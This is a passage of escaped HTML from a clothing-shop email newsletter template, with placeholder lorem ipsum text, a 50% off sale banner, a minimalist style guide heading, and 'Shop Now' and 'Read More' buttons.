cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612261885054-V.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 300px;\\\" width=\\\"300\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"background-color: #ffffff;width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ffffff;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a87f6b; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 44px; line-height: 61.6px; font-family: \'comic sans ms\', sans-serif;\\\">Huge Range<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 44px; line-height: 61.6px; font-family: \'comic sans ms\', sans-serif;\\\">of Trendy<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 44px; line-height: 61.6px; font-family: \'comic sans ms\', sans-serif;\\\">Clothing<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 25px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:arial,helvetica,sans-serif;\\\"><tr><td style=\\\"font-family:arial,helvetica,sans-serif;\\\" align=\\\"center\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:36px; v-text-anchor:middle; width:144px;\\\" arcsize=\\\"3%\\\" strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#a87f6b;font-family:arial,helvetica,sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:arial,helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #a87f6b; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"font-size: 14px; line-height: 16.8px;\\\">S H O P&nbsp; &nbsp;N O W<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #e8dcd0;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-image: url(\'https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\');background-repeat: no-repeat;background-position: center top;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-image: url(\'https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\');background-repeat: no-repeat;background-position: center top;background-color: #e8dcd0;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a47e6b; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-size: 32px; line-height: 44.8px; font-family: \'Playfair Display\', serif;\\\">\\\" Keeping it <\\/span><span style=\\\"font-family: \'Playfair Display\', serif; font-size: 32px; line-height: 44.8px;\\\">simple \\\"<\\/span><\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #292828; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Lorem ipsum dolor sit amet, consectetur adipiscing elit,<\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\">sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 25px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:arial,helvetica,sans-serif;\\\"><tr><td style=\\\"font-family:arial,helvetica,sans-serif;\\\" align=\\\"center\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:36px; v-text-anchor:middle; width:152px;\\\" arcsize=\\\"3%\\\" strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#a87f6b;font-family:arial,helvetica,sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:arial,helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #a87f6b; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"font-size: 14px; line-height: 16.8px;\\\">R E A D&nbsp; M O R E<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a77d6d; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-family: \'Playfair Display\', serif; font-size: 14px; line-height: 19.6px;\\\"><strong><span style=\\\"font-size: 34px; line-height: 47.6px;\\\">UP TO <span style=\\\"font-size: 44px; line-height: 61.6px;\\\">50<\\/span>% OFF<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #34495e; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-size: 22px; line-height: 30.8px;\\\">L o r e m&nbsp; &nbsp;i p s u m&nbsp; &nbsp;d o l o r<\\/span><\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:5px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"48%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #34495e;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\"><span style=\\\"font-family: \'comic sans ms\', sans-serif; font-size: 14px; line-height: 22.4px;\\\">\\\" Lorem ipsum dolor sit amet, consectetur adipiscing elit,<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 160%;\\\"><span style=\\\"font-family: \'comic sans ms\', sans-serif; font-size: 14px; line-height: 22.4px;\\\">sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 160%;\\\"><span style=\\\"font-family: \'comic sans ms\', sans-serif; font-size: 14px; line-height: 22.4px;\\\">Ut enim ad minim veniam \\\"<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 40px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:arial,helvetica,sans-serif;\\\"><tr><td style=\\\"font-family:arial,helvetica,sans-serif;\\\" align=\\\"center\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:36px; v-text-anchor:middle; width:152px;\\\" arcsize=\\\"3%\\\" strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#a87f6b;font-family:arial,helvetica,sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:arial,helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #a87f6b; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"font-size: 14px; line-height: 16.8px;\\\">R E A D&nbsp; M O R E<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffefef;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-image: url(\'https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612264788124-cc.png\');background-repeat: no-repeat;background-position: center top;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-image: url(\'https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612264788124-cc.png\');background-repeat: no-repeat;background-position: center top;background-color: #ffefef;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a47e6b; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 36px; line-height: 50.4px;\\\">A Simple Guide to<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 36px; line-height: 50.4px;\\\">Minimalist S<\\/span><span style=\\\"font-size: 36px; line-height: 50.4px;\\\">tyle.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:5px 10px 50px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:arial,helvetica,sans-serif;\\\"><tr><td style=\\\"font-family:arial,helvetica,sans-serif;\\\" align=\\\"center\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:36px; v-text-anchor:middle; width:144px;\\\" arcsize=\\\"3%\\\" strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#a87f6b;font-family:arial,helvetica,sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:arial,helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #a87f6b; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"font-size: 14px; line-height: 16.8px;\\\">S H O P&nbsp; &nbsp;N O W<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      